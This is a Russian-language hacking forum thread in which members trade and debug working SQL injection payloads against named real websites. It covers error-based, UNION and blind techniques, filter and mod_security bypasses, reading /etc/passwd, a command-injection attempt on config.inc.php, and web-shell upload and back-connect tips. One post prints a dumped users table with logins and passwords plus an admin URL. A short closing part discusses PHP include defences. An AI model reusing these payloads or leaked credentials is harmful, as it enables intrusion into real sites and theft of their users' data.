GROUP BY BINARY `information_schema`.`SCHEMATA`.`SCHEMA_NAME`
ORDER BY BINARY `"]) OR exec('cp $(pwd)"/config.inc.php" config.txt');` DESC

Відповідь MySQL: Документація
#1054 - Unknown column '"]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); ' in 'order clause'

получается фильтруется переменная sort_by? Или может я где накосячил?

http://www.tomydate.com/search_results.php?keyword=1'
помогите)
http://www.tomydate.com/search_results.php?keyword=1')+or(1,2)=(select*fro m(select+name_const(version(),1),name_const(versio n(),1))a)--+
http://enjoy.md/category.php?id=6+or+1=if%28load_file%28%27/etc/passwd%27%29+is+not+NULL,1,2%29--+
значит всё же file_priv=Y? если я чёт намудрил плз исправьте

нету там доступа к файлам
кстати: @@datadir - /var/lib/mysql/
а при ошибке даёт другой путь: /home/vhosts/enjoy.md/public_html/category.php

так датадир это домашняя дира самого мускула, кстате еслиб была возможность читать файлы можно было бы слить сразу инфу всю с таблиц если буфер позволит) а то что при ошибки это директория самого сайта видная из веба

решил разобратся с логикой запроса от warlok'a
прочитал статью квазара
mysql> SELECT concat(user,0x3a,password) FROM user LIMIT 1;
+------------------------------------------------+
| concat(user,0x3a,password) |
+------------------------------------------------+
| root:*9669961C585153793F9B665C709E9A7DF18 |
+------------------------------------------------+
1 row in set (0.00 sec)

mysql> SELECT NAME_CONST((SELECT concat(user,0x3a,password) FROM user LIMIT 2),1);
ERROR 1210 (HY000): Incorrect arguments to NAME_CONST
mysql> select version();
+-----------------+
| version() |
+-----------------+
| 5.0.83-0ubuntu3 |

что не так?

и почему не прокатывает
http://www.tomydate.com/search_results.php?keyword=1')+or(1,2)=(select*fro m(select+name_const(user(),1),name_const(user(),1) )a)--+
Message: Can't execute query: Incorrect arguments to NAME_CONST

дело в этом:

union SELECT concat_ws(0x3a,user,password)+FROM user LIMIT 0,1--+

перебор лимитом:
0,1
1,1
2,1 и т.д.

решил разобратся с логикой запроса от warlok'a
прочитал статью квазара

что не так?

и почему не прокатывает
http://www.tomydate.com/search_results.php?keyword=1')+or(1,2)=(select*fro m(select+name_const(user(),1),name_const(user(),1) )a)--+


http://www.tomydate.com/search_results.php?keyword=1')+or+1=(select+1+from +(select+count(0),concat((select+user()+from+infor mation_schema.tables+limit+1),floor(rand(0)*2))+fr om+information_schema.tables+group+by+2+limit+1)a)--+

http://www.tomydate.com/search_results.php?keyword=1')+or+1=(select+1+from +(select+count(0),concat((select+user()+from+infor mation_schema.tables+limit+1),floor(rand(0)*2))+fr om+information_schema.tables+group+by+2+limit+1)a) --+

чёт не могу втыкнуть в этот запрос совсем, не могли бы обьяснить или сылку дать
просто в других иньекциях не пашет

нужна помощь:
в скрипте стоит защита такого плана. Насколько я понял, ищется вхождение слов from и union в запрос(ну вернее в id). Если они есть, то сервер выдаёт error с мылом web-мастера. Как можно обойти это дело?
FrOm не подходит

ссылку надо, вариантов масса (защиты)

http://www.gtbit.org/news/viewitem.php?id=37

ещё в чём фишка:
если так
http://www.gtbit.org/news/viewitem.php?id=37+and+ascii(substring((select+tab le_name+from+information_schema.tables),1,1))=53
то страница Not Acceptable
а если
http://www.gtbit.org/news/viewitem.php?id=37+and+ascii(substring((select+123 +from+123),1,1))=53
то Internal Server Error

Довольно странно, получается что запрос выполняется

оно там еще по ip банит, сцуко

есть такая хрень... ну мб и не совсем так. Просто в результате некоторых "неверных" действий, сайт подвисает на некоторое время(я замечал такое когда name_const используешь при задании limit с номером несуществующей записи). Но он подвисает не сам, а только у клиента. Это довольно странно, я писал об этом, но тему удалили=) Ну я использую tor, то он меня не банит) а если там что-то типа такого кода

$id=$_GET['id'];
$id=lowercase($id);//точно не помню как она в пхп звучит, по этаму написал как в delphi
if (strstr('from',$id)>0) showerror;

как такое обойти?

карочи я вообще задолбался раскрутит эту скул:
http://www.bourdela.tv/index.php?topic=2'

никак не могу обходит фильтр кавычки, всё перепробовал
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/index.php?topic=2'' AND cookie_info=''' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1]
может кто посоветует обход

есть такая хрень... ну мб и не совсем так. Просто в результате некоторых "неверных" действий, сайт подвисает на некоторое время(я замечал такое когда name_const используешь при задании limit с номером несуществующей записи). Но он подвисает не сам, а только у клиента. Это довольно странно, я писал об этом, но тему удалили=) Ну я использую tor, то он меня не банит) а если там что-то типа такого кода

$id=$_GET['id'];
$id=lowercase($id);//точно не помню как она в пхп звучит, по этаму написал как в delphi
if (strstr('from',$id)>0) showerror;

как такое обойти?
PHP :)))

id=123456768+union+select+1+--+
12345678 больше нуля, и проходит дальше, PHP сравнивает только первое вхождение.

Как выполнить комманду,если

disable_functions system,exec,passthru,shell_exec,posix_getpwuid,cmd ,escapeshellcmd,popen,proc_open,ini_restore,dbmope n,suexec,show_source,escapeshellarg,set_time_limit ,set_memory_limit


php 5.2.5

2.:[melkiy]:.
а может попробуешь загрузить перловый или SSI шелл!
SSI шелл дето здесь на ачате лежит!

PHP :)))

id=123456768+union+select+1+--+
12345678 больше нуля, и проходит дальше, PHP сравнивает только первое вхождение.
Что-то ты какую-то хрень непонятную написал)
У меня ищет вхождения подстроки 'from' и 'union', проичём тут 12345678?

2.:[melkiy]:.
а может попробуешь загрузить перловый или SSI шелл!
SSI шелл дето здесь на ачате лежит!

Пробывал

ну зато есть fopen fgets и тому подобное мб ценное мб в файлах...

У меня и так есть доступ к файлам. Нужно просто запустить бэк-коннект, чтобы порутать.Но комманды не пашут ибо:

disable_functions system,exec,passthru,shell_exec,posix_getpwuid,cmd ,escapeshellcmd,popen,proc_open,ini_restore,dbmope n,suexec,show_source,escapeshellarg,set_time_limit ,set_memory_limit

Причем тут fopen и тп? Оо

safe mode Off

Что-то ты какую-то хрень непонятную написал)
У меня ищет вхождения подстроки 'from' и 'union', проичём тут 12345678?
Не о том подумал =\
Я думал про фильтрацию числе.

Ну если на union, можно как слепую.

Не о том подумал =\
Я думал про фильтрацию числе.

Ну если на union, можно как слепую.

ну это понятно, но тут второй косяк: фильтрация на from ещё...

оказывается там не фильтрация... что-то очень хитрое, чего я догнать не могу

такой запрос проходит

http://www.gtbit.org/news/viewitem.php?id=37/*from*/+and+ascii(substring((select+version()),1,1))=53


значит всё-таки запрос обрабатывается

Я вот думаю, может это как-то сервер хитро настроен?

запрос:

http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union

проходит, а в связке с select выдаёт ошибку(с union+all+select тоже)

http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union+select


Получается не ищется вхождение подстроки 'union' и 'from'.
Также 'union' и 'from' не вырезается из строки, потому что

http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union
http://www.gtbit.org/news/viewitem.php?id=37+and+1=1+union

выдаёт ошибку мускуля

самое интересное то, что когда пишешь:

http://www.gtbit.org/news/viewitem.php?id=37+and+1=2+union+select

то он выдаёт ошибку


Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@gtbit.org and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


а при union без select


Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/gtbitor/public_html/news/viewitem.php on line 45


Почему такая реакция?

карочи я вообще задолбался раскрутит эту скул:


никак не могу обходит фильтр кавычки, всё перепробовал

может кто посоветует обход

http://www.bourdela.tv/index.php?topic=2')and(1=1)--+ тоже одинаковый результат

2 Seravin:

mod_security там стоит и, если запрос корректный, а не сплошные ошибки синтаксиса sql-запроса, то тогда он реагирует на from и union, фильтры типо "/*!...*/ и прочие возвраты кареток не помогают в данном случае (вроде бы)

http://opennet.ru/base/sec/mod_security2.txt.html
http://forum.ovh.com/archive/index.php/t-30298.html

почитаешь тогда станет понятно, почему на одно действие 500, а на другое 406 какое-нибудь

а на что-то типо:


http://www.gtbit.org/news/viewitem.php?id=37+from+and+ascii(substring((selec t+version()),1,1))=53


он тебе и так по русски пишет - Warning, потому что неправильный синтаксис

2 Seravin:

mod_security там стоит и, если запрос корректный, а не сплошные ошибки синтаксиса sql-запроса, то тогда он реагирует на from и union, фильтры типо "/*!...*/ и прочие возвраты кареток не помогают в данном случае (вроде бы)

http://opennet.ru/base/sec/mod_security2.txt.html
http://forum.ovh.com/archive/index.php/t-30298.html

почитаешь тогда станет понятно, почему на одно действие 500, а на другое 406 какое-нибудь

а на что-то типо:


http://www.gtbit.org/news/viewitem.php?id=37+from+and+ascii(substring((selec t+version()),1,1))=53


он тебе и так по русски пишет - Warning, потому что неправильный синтаксис

там не form, а /*form*/, но за ответ спасибо, почитаю

YuNi|[c,
http://www.bourdela.tv/?'or(select+count(*)from(information_schema.column s)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/7,1)*'

Читал на форуме о Blind Injectionно не нашел как вывести ил колонки данные. (наверно плохо читал...)

Вот запрос:

http://www.pharmabort.ru/page.php?id=-16%20and%20%28SELECT%20sipt%28concat%280x3b,login, password%29,1,1%29%20from%20users%20limit%200,1%29 =1

Логин и пасс админа не выводит...

Читал на форуме о Blind Injectionно не нашел как вывести ил колонки данные. (наверно плохо читал...)

Вот запрос:



Логин и пасс админа не выводит...

http://www.pharmabort.ru/page.php?id=-15 UNION SELECT 1,2,3,concat(0x7e,pharma_admins.login,0x7e,pharma_ admins.password,0x7e,pharma_admins.name,0x7e),5,6, 7,8,9,10,11,12,13,14,15+FROM+pharmabort.pharma_adm ins+LIMIT+0,1--
~mooncat~sql~netservice~
LIMIT+1,1--
~cons1~cons~Консультант

уже не надо этот скул

[Feldmarschall], ничего не выводит =(

Удалил все пробели, все ровно не выводит. Вы проходили по ссыле? Посмотрите сами.

Подскажите, почему не отображаются данные?
http://www.spbpost.ru/index.php?page_id=69+union+select+1,2,3,4,5,6,7,8, 9,concat%28user%28%29,database%28%29%29,11,12,13,1 4,15,16,17+limit+1,1+--+

CyberHunter, надо указать базу и таблицу откуда хотите вывести данные.

CyberHunter, надо указать базу и таблицу откуда хотите вывести данные.
Я хочу спросить почему не выводится " USER(), DATABASE() и т.д. "?

http://guideandroid.com/product.php?id=-4+union+/*!select*/+1,2,/*!table_name*/,4,5,6,7,8+from+information_schema.tables+where+/*!table_schema*/=0x6775616E64636F6D5F6761

a zacem tak polucaetsya ??

Подскажите, почему не отображаются данные?
http://www.spbpost.ru/index.php?page_id=69+union+select+1,2,3,4,5,6,7,8, 9,concat%28user%28%29,database%28%29%29,11,12,13,1 4,15,16,17+limit+1,1+--+


http://www.spbpost.ru/index.php?page_id=(select+1+from+(select+count(0), concat((select+version()+from+information_schema.t ables+limit+1),floor(rand(0)*2))+from+information_ schema.tables+group+by+2+limit+1)a)--+


PS: хотя бы тему читали иногда

Я хочу спросить почему не выводится " USER(), DATABASE() и т.д. "?

http://www.spbpost.ru/index.php?page_id=-69.9%0AUNION%0AALL%0ASELECT%0A1,2,3,4,5,6,7,8,9,co ncat(0x7e,0x27,Hex(cast(database()%0Aas%0Achar)),0 x27,0x7e),11,12,13,14,15,16,17--

смотри в исходнике
<meta name="keywords" content="~'737062706F73745F6462'~">

тоесть spbpost_db

YuNi|[c Хотел спросить: а почему в этой инъекции данные отображаются в исходнике, а не на странице?

Потому что метатеги на странице не отображаются

YuNi|[c, а зачем его в hex переводить, да еще и cast юзать, и переносы строки (%0a) вместо обычных пробелов?

CyberHunter, юзай:
http://www.spbpost.ru/index.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,unhex(hex(concat_ ws(0x3a,user(),database(),version()))),11,12,13,14 ,15,16,17
spbpost@localhost:spbpost_db:5.1.42-log

пора бы уже начать понимать, что union и вообще подбор кол-ва колонок и выявление принтабельных уже просто неакутальны практически, прошлый век)

пора бы уже начать понимать, что union и вообще подбор кол-ва колонок и выявление принтабельных уже просто неакутальны практически, прошлый век)
А что актуально, магистр?

посмотри последний вопрос по скуле и еще страниц 5 назад *извращенцы*

А что актуально, магистр?


Он про "новый" способ
Что-то типа такого.


script.php?id=(select+1+from+(select+count(0),conc at((select+version()+from+information_schema.table s+limit+1), floor(rand(0)*2))+from+information_schema.tables+g roup+by+2+limit+1)a)


извращение еще то.

YuNi|[c, а зачем его в hex переводить, да еще и cast юзать, и переносы строки (%0a) вместо обычных пробелов?

CyberHunter, юзай:
http://www.spbpost.ru/index.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,unhex(hex(concat_ ws(0x3a,user(),database(),version()))),11,12,13,14 ,15,16,17
spbpost@localhost:spbpost_db:5.1.42-log
ну не стреляй в пианиста, он играет как можеть ))

Если накодиш для автоматизации сорец вот тогда пригодится мой вариант

ну так, как я понимаю, это дело работает когда есть вывод ошибки?

пора бы уже начать понимать, что union и вообще подбор кол-ва колонок и выявление принтабельных уже просто неакутальны
и не говори; новый век вообще внес кардинальные изменения в хек-основы знаний нашего поколения: фтп стал быстрее зипа, например ;)

фтп всегда был круче )

http://www.bourdela.tv/?'or(select+count(*)from(information_schema.column s)/**/group/**/by/**/concat(table_name,floor(rand(0)*2))/**/limit/**/7,1)*'

Не очень то получается с лимитом для вывода поочередно имена таблиц ((

http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/0,1)a)*'

http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/1,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/1,1)a)*'

http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/2,1),floor(rand(0)*2))/**/from/**/information_schema.tables/**/group/**/by/**/2/**/limit/**/2,1)a)*'

народ подскажите пжл, есть доступ в админку пытаюсь залить шелл через форму добовления банера, не разрешает. доступа к файлу ./htaccess нет

http://www.nwec.ru/index.php?issue_id=57
Мучаюсь,мучаюсь, решил спросить, можно ли что сделать с этим сайтиком, id повсюду, фильтрация ничего не дает сделать..( Помогите.

Вот смотри:
http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11+--+

народ подскажите пжл, есть доступ в админку пытаюсь залить шелл через форму добовления банера, не разрешает. доступа к файлу ./htaccess нет


способов масса, большинство описаны на форуме.

обрезать нульбайтом, двойное расширение, загрузка файла как есть, с последующим инклюдом его (если LFI на сайте или серве) ну и некоторые другие способы

Да,вывод видел,это слепая,да?Так как узнать уязвимое поле?(
Я в уязвимостях не очень шарю. Просто в этом случае смог подобрать количество полей.

Я другого не могу понять (вчера спрашивал, но здесь не могу все-равно). Почему не выводится инфа когда ввожу типа USER()? Пробовал так:
http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,USER(), 6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.TABLES+LIMIT +1,1+--+
Что не так? И как сделать чтобы выводилось?

Я в уязвимостях не очень шарю. Просто в этом случае смог подобрать количество полей.

Я другого не могу понять (вчера спрашивал, но здесь не могу все-равно). Почему не выводится инфа когда ввожу типа USER()? Пробовал так:
http://www.nwec.ru/index.php?issue_id=57+UNION+SELECT+1,2,3,4,USER(), 6,7,8,9,10,11+FROM+INFORMATION_SCHEMA.TABLES+LIMIT +1,1+--+
Что не так? И как сделать чтобы выводилось?

а с чего ты взял, что поле №5 принтабельное? По мне там просто слепая инъекция, совсем слепая:

http://www.nwec.ru/index.php?issue_id=57+and+substring(version(),1,1) =5

@@basedir: /usr/
@@tmpdir: /tmp/
@@datadir: /data/
version(): 5.0.77-log
database(): db_cevzap_1
@@version_compile_os: unknown-linux-gnu


хотя может и не так)

двойное расширение не катит, пробовал. обрезать нульбайтом у меня получается так shell.%00.php не загружается.

Pashkela у меня так ничего не показывает. Скажи как найти принтабельное поле?
Подставлять вместо каждой цифры? И можно ли как-то вывести эти данные так как написал я?

CyberHunter, это слепая инъекция. Принтабельных полей тут нет, вывода, соответственно, тоже.

CyberHunter, это слепая инъекция. Принтабельных полей тут нет, вывода, соответственно, тоже.
И что делать в таких случаях? Где можно об этом почитать?

Дайте плз кто-нибудь ссылку на инфу о слепых инъекциях.

Дайте плз кто-нибудь ссылку на инфу о слепых инъекциях.
https://forum.antichat.ru/showthread.php?t=119047

Тоесть сайт не нагнуть, зато поиск не фильтрует <> и скрипты спокойно выполняются)(Может и не в тему написал)=))


http://www.nwec.ru/index.php?issue_id=57 AND Length((SELECT albums.id FROM db_cevzap_1.albums LIMIT 0,1))<32
..

а с чего ты взял, что поле №5 принтабельное? По мне там просто слепая инъекция, совсем слепая:
CyberHunter, это слепая инъекция. Принтабельных полей тут нет, вывода, соответственно, тоже.
паша та там принтабельный полей точно нет ...
вам просто не хватает хекерской догадки 34%, зацените :)
http://www.nwec.ru/index.php?issue_id=54

//ps sipt:

Database Version: 5.0.77-log
Database name: db_cevzap_1
User name: dbu_cevzap_1@192.168.5.56
0 :In database information_schema found table CHARACTER_SETS
0 : CHARACTER_SET_NAME
1 : DEFAULT_COLLATE_NAME
2 : DESCRIPTION
3 : MAXLEN
1 :In database information_schema found table CLIENT_STATISTICS
0 : CLIENT
1 : TOTAL_CONNECTIONS
2 : CONCURRENT_CONNECTIONS
3 : CONNECTED_TIME
4 : BUSY_TIME
5 : CPU_TIME
6 : BYTES_RECEIVED
7 : BYTES_SENT
8 : BINLOG_BYTES_WRITTEN
9 : ROWS_FETCHED
10 : ROWS_UPDATED
11 : TABLE_ROWS_READ
12 : SELECT_COMMANDS
13 : UPDATE_COMMANDS
14 : OTHER_COMMANDS
15 : COMMIT_TRANSACTIONS
16 : ROLLBACK_TRANSACTIONS
17 : DENIED_CONNECTIONS
18 : LOST_CONNECTIONS
19 : ACCESS_DENIED
20 : EMPTY_QUERIES
2 :In database information_schema found table COLLATIONS
0 : COLLATION_NAME
1 : CHARACTER_SET_NAME
2 : ID
3 : IS_DEFAULT
4 : IS_COMPILED
5 : SORTLEN
3 :In database information_schema found table COLLATION_CHARACTER_SET_APPLICABILITY
0 : COLLATION_NAME
1 : CHARACTER_SET_NAME
4 :In database information_schema found table COLUMNS
0 : TABLE_CATALOG
1 : TABLE_SCHEMA
2 : TABLE_NAME
3 : COLUMN_NAME
4 : ORDINAL_POSITION
5 : COLUMN_DEFAULT
6 : IS_NULLABLE
7 : DATA_TYPE
8 : CHARACTER_MAXIMUM_LENGTH
9 : CHARACTER_OCTET_LENGTH
10 : NUMERIC_PRECISION
11 : NUMERIC_SCALE
12 : CHARACTER_SET_NAME
13 : COLLATION_NAME
14 : COLUMN_TYPE
15 : COLUMN_KEY
16 : EXTRA
17 : PRIVILEGES
18 : COLUMN_COMMENT
5 :In database information_schema found table COLUMN_PRIVILEGES
0 : GRANTEE
1 : TABLE_CATALOG
2 : TABLE_SCHEMA
3 : TABLE_NAME
4 : COLUMN_NAME
5 : PRIVILEGE_TYPE
6 : IS_GRANTABLE
6 :In database information_schema found table INDEX_STATISTICS
0 : TABLE_SCHEMA
1 : TABLE_NAME
2 : INDEX_NAME
3 : ROWS_READ
7 :In database information_schema found table KEY_COLUMN_USAGE
0 : CONSTRAINT_CATALOG
1 : CONSTRAINT_SCHEMA
2 : CONSTRAINT_NAME
3 : TABLE_CATALOG
4 : TABLE_SCHEMA
5 : TABLE_NAME
6 : COLUMN_NAME
7 : ORDINAL_POSITION
8 : POSITION_IN_UNIQUE_CONSTRAINT
9 : REFERENCED_TABLE_SCHEMA
10 : REFERENCED_TABLE_NAME
11 : REFERENCED_COLUMN_NAME
8 :In database information_schema found table PROFILING
0 : QUERY_ID
1 : SEQ
2 : STATE
3 : DURATION
4 : CPU_USER
5 : CPU_SYSTEM
6 : CONTEXT_VOLUNTARY
7 : CONTEXT_INVOLUNTARY
8 : BLOCK_OPS_IN
9 : BLOCK_OPS_OUT
10 : MESSAGES_SENT
11 : MESSAGES_RECEIVED
12 : PAGE_FAULTS_MAJOR
13 : PAGE_FAULTS_MINOR
14 : SWAPS
15 : SOURCE_FUNCTION
16 : SOURCE_FILE
17 : SOURCE_LINE
9 :In database information_schema found table ROUTINES
0 : SPECIFIC_NAME
1 : ROUTINE_CATALOG
2 : ROUTINE_SCHEMA
3 : ROUTINE_NAME
4 : ROUTINE_TYPE
5 : DTD_IDENTIFIER
6 : ROUTINE_BODY
7 : ROUTINE_DEFINITION
8 : EXTERNAL_NAME
9 : EXTERNAL_LANGUAGE
10 : PARAMETER_STYLE
11 : IS_DETERMINISTIC
12 : SQL_DATA_ACCESS
13 : SQL_PATH
14 : SECURITY_TYPE
15 : CREATED
16 : LAST_ALTERED
17 : SQL_MODE
18 : ROUTINE_COMMENT
19 : DEFINER
10 :In database information_schema found table SCHEMATA
0 : CATALOG_NAME
1 : SCHEMA_NAME
2 : DEFAULT_CHARACTER_SET_NAME
3 : DEFAULT_COLLATION_NAME
4 : SQL_PATH
11 :In database information_schema found table SCHEMA_PRIVILEGES
0 : GRANTEE
1 : TABLE_CATALOG
2 : TABLE_SCHEMA
3 : PRIVILEGE_TYPE
4 : IS_GRANTABLE
12 :In database information_schema found table STATISTICS
0 : TABLE_CATALOG
1 : TABLE_SCHEMA
2 : TABLE_NAME
3 : NON_UNIQUE
4 : INDEX_SCHEMA
5 : INDEX_NAME
6 : SEQ_IN_INDEX
7 : COLUMN_NAME
8 : COLLATION
9 : CARDINALITY
10 : SUB_PART
11 : PACKED
12 : NULLABLE
13 : INDEX_TYPE
14 : COMMENT
13 :In database information_schema found table TABLES
0 : TABLE_CATALOG
1 : TABLE_SCHEMA
2 : TABLE_NAME
3 : TABLE_TYPE
4 : ENGINE
5 : VERSION
6 : ROW_FORMAT
7 : TABLE_ROWS
8 : AVG_ROW_LENGTH
9 : DATA_LENGTH
10 : MAX_DATA_LENGTH
11 : INDEX_LENGTH
12 : DATA_FREE
13 : AUTO_INCREMENT
14 : CREATE_TIME
15 : UPDATE_TIME
16 : CHECK_TIME
17 : TABLE_COLLATION
18 : CHECKSUM
19 : CREATE_OPTIONS
20 : TABLE_COMMENT
14 :In database information_schema found table TABLE_CONSTRAINTS
0 : CONSTRAINT_CATALOG
1 : CONSTRAINT_SCHEMA
2 : CONSTRAINT_NAME
3 : TABLE_SCHEMA
4 : TABLE_NAME
5 : CONSTRAINT_TYPE
15 :In database information_schema found table TABLE_PRIVILEGES
0 : GRANTEE
1 : TABLE_CATALOG
2 : TABLE_SCHEMA
3 : TABLE_NAME
4 : PRIVILEGE_TYPE
5 : IS_GRANTABLE
16 :In database information_schema found table TABLE_STATISTICS
0 : TABLE_SCHEMA
1 : TABLE_NAME
2 : ROWS_READ
3 : ROWS_CHANGED
4 : ROWS_CHANGED_X_INDEXES
17 :In database information_schema found table TRIGGERS
0 : TRIGGER_CATALOG
1 : TRIGGER_SCHEMA
2 : TRIGGER_NAME
3 : EVENT_MANIPULATION
4 : EVENT_OBJECT_CATALOG
5 : EVENT_OBJECT_SCHEMA
6 : EVENT_OBJECT_TABLE
7 : ACTION_ORDER
8 : ACTION_CONDITION
9 : ACTION_STATEMENT
10 : ACTION_ORIENTATION
11 : ACTION_TIMING
12 : ACTION_REFERENCE_OLD_TABLE
13 : ACTION_REFERENCE_NEW_TABLE
14 : ACTION_REFERENCE_OLD_ROW
15 : ACTION_REFERENCE_NEW_ROW
16 : CREATED
17 : SQL_MODE
18 : DEFINER
18 :In database information_schema found table USER_PRIVILEGES
0 : GRANTEE
1 : TABLE_CATALOG
2 : PRIVILEGE_TYPE
3 : IS_GRANTABLE
19 :In database information_schema found table USER_STATISTICS
0 : USER
1 : TOTAL_CONNECTIONS
2 : CONCURRENT_CONNECTIONS
3 : CONNECTED_TIME
4 : BUSY_TIME
5 : CPU_TIME
6 : BYTES_RECEIVED
7 : BYTES_SENT
8 : BINLOG_BYTES_WRITTEN
9 : ROWS_FETCHED
10 : ROWS_UPDATED
11 : TABLE_ROWS_READ
12 : SELECT_COMMANDS
13 : UPDATE_COMMANDS
14 : OTHER_COMMANDS
15 : COMMIT_TRANSACTIONS
16 : ROLLBACK_TRANSACTIONS
17 : DENIED_CONNECTIONS
18 : LOST_CONNECTIONS
19 : ACCESS_DENIED
20 : EMPTY_QUERIES
21 : LAST_STAT_FLUSH_TIME
22 : SELECT_FULL_JOIN_COUNT
23 : SELECT_SCAN_COUNT
24 : CREATED_TMP_DISK_TABLES
25 : LONG_QUERY_COUNT
20 :In database information_schema found table VIEWS
0 : TABLE_CATALOG
1 : TABLE_SCHEMA
2 : TABLE_NAME
3 : VIEW_DEFINITION
4 : CHECK_OPTION
5 : IS_UPDATABLE
6 : DEFINER
7 : SECURITY_TYPE
21 :In database db_cevzap_1 found table albums
0 : id
1 : object
2 : issue_id
3 : sortorder
4 : author
5 : title
6 : discription
7 : params
8 : flags
9 : date
10 : meta_title
11 : meta_keywords
12 : meta_discription
13 : image
22 :In database db_cevzap_1 found table articles
0 : id
1 : object_id
2 : sortorder
3 : issue_id
4 : date
5 : uid
6 : title
7 : text
23 :In database db_cevzap_1 found table bannerblocks
0 : BlockID
1 : Alias
2 : Name
3 : MaxItems
4 : Rule
5 : Template
24 :In database db_cevzap_1 found table banners
0 : BannerID
1 : BlockID
2 : IssueID
3 : Code
4 : Link
5 : File
6 : Shows
7 : Clicks
8 : Expire
9 : ShowsLimit
25 :In database db_cevzap_1 found table catalog
0 : PID
1 : ClassID
2 : Date
3 : Name
4 : Announce
5 : FullText
6 : Price
7 : Photo
8 : P1value
9 : P2value
10 : ShortCut
11 : Quantity
12 : sortorder
13 : galery_link
26 :In database db_cevzap_1 found table catitems
0 : id
1 : itemid
2 : sortorder
3 : name
4 : mainpage
5 : link
27 :In database db_cevzap_1 found table cities
0 : id
1 : name
2 : sortorder
28 :In database db_cevzap_1 found table classificator
0 : IssueID
1 : ObjectID
2 : StructID
3 : ParentID
4 : SortOrder
5 : Name
6 : Phrase_1
7 : Phrase_2
8 : Phrase_3
29 :In database db_cevzap_1 found table clients
0 : UserID
1 : Login
2 : Password
3 : Name
4 : Org
5 : Position
6 : Email
7 : Active
30 :In database db_cevzap_1 found table globals
0 : id
1 : name
2 : value
31 :In database db_cevzap_1 found table images
0 : id
1 : object
2 : sortorder
3 : album
4 : date
5 : title
6 : discription
7 : image
8 : thumb
32 :In database db_cevzap_1 found table imp_news
0 : id
1 : title
2 : description
3 : link
4 : datetime
5 : active
33 :In database db_cevzap_1 found table issues
0 : id
1 : parent
2 : order
3 : object
4 : name
5 : type
6 : params
7 : flags
8 : sign
9 : mainpage
10 : link
34 :In database db_cevzap_1 found table issues_rights
0 : id
1 : user_id
2 : issue_id
3 : deny
35 :In database db_cevzap_1 found table news
0 : id
1 : sortorder
2 : object
3 : issue_id
4 : title
5 : small_text
6 : full_text
7 : image
36 :In database db_cevzap_1 found table objects
0 : id
1 : date
2 : author
3 : type
4 : access
5 : meta_title
6 : meta_keywords
7 : meta_discription
37 :In database db_cevzap_1 found table users
0 : id
1 : login
2 : password
3 : status
4 : nick
5 : userdata
6 : usergroup
7 : block
8 : allowedactions
38 :In database db_cevzap_1 found table vacancies
0 : id
1 : city_id
2 : position
3 : data
4 : sortorder
Getting Data from table users ( Rows) from database db_cevzap_1
Fields login:password

[1]:personal:P@s$W0Rd
[2]:e_efros:e_efros
[3]:sn_dmitrieva:Pa$$w0rD
[4]:k_shishkin:$trong_P@ssw0rd
[5]:a_avrashov:a_avrashov

End Data

http://www.nwec.ru/admin.php

http://www.gymvaruhuset.com/ скажите с чем имею дело? как быть с таким сайтом?

проблема в том, что любой автоматический сканер уязвимостей (Xspider. Acunetix и тд) при проверке показывает все порты (абсолютно все с первого до 9999 го), а после начинает их проверять на уязвимости. Что это и как бороться?
Вчера еще такого не было.

http://www.gymvaruhuset.com/ скажите с чем имею дело? как быть с таким сайтом?
А что ты хочешь то?

проблема в том, что любой автоматический сканер уязвимостей (Xspider. Acunetix и тд) при проверке показывает все порты (абсолютно все с первого до 9999 го), а после начинает их проверять на уязвимости. Что это и как бороться?
Вчера еще такого не было.
Портов есть 65535, а не 9999. И, кстати, не юзай сканеры.

А что ты хочешь то?


Портов есть 65535, а не 9999. И, кстати, не юзай сканеры.

Обоим ответы дал расширенные. Гуру...
Может кто знает? Хотелось бы узнать ответ на мой вопрос, а не наставление, чем мне пользоваться

ребята подскажите как в таком случае,защитится от инклуда?
<?
if ($page=="") $page="any.htm";
include($page);
?>
пробовал

//защита от ядовитого нуля
//if (!get_magic_quotes_gpc())
//$page=addslashes($page);

//добавляем расширение пхп
include($page.'.php');
но тогда к "any.htm" добавляется .php
может исключения както можно зделать? или еще что попроще...

//защита от ядовитого нуля
//if (!get_magic_quotes_gpc())
//$page=addslashes($page);


Не забываем о _https://forum.antichat.ru/thread98525.html


switch($page) {
case 'page1':
include("page1.html");
break;

case 'page2':
include("page2.html");
break;

case 'page3':
include("page3.html");
break;

...

default:
include("home.html");
break;
}

ребята подскажите как в таком случае,защитится от инклуда?
<?
if ($page=="") $page="any.htm";
include($page);
?>
пробовал

//защита от ядовитого нуля
//if (!get_magic_quotes_gpc())
//$page=addslashes($page);

//добавляем расширение пхп
include($page.'.php');
но тогда к "any.htm" добавляется .php
может исключения както можно зделать? или еще что попроще...



<?
if ($page=="") {
$page="any.php";
include($page);
}else{
str_repalce('.', '', $page);
str_repalce('\', '', $page);
if(file_exists($page)){
include($page);
}
}
?>

самый простой способ.
Ну или как выше описали, при помощи switch-ей

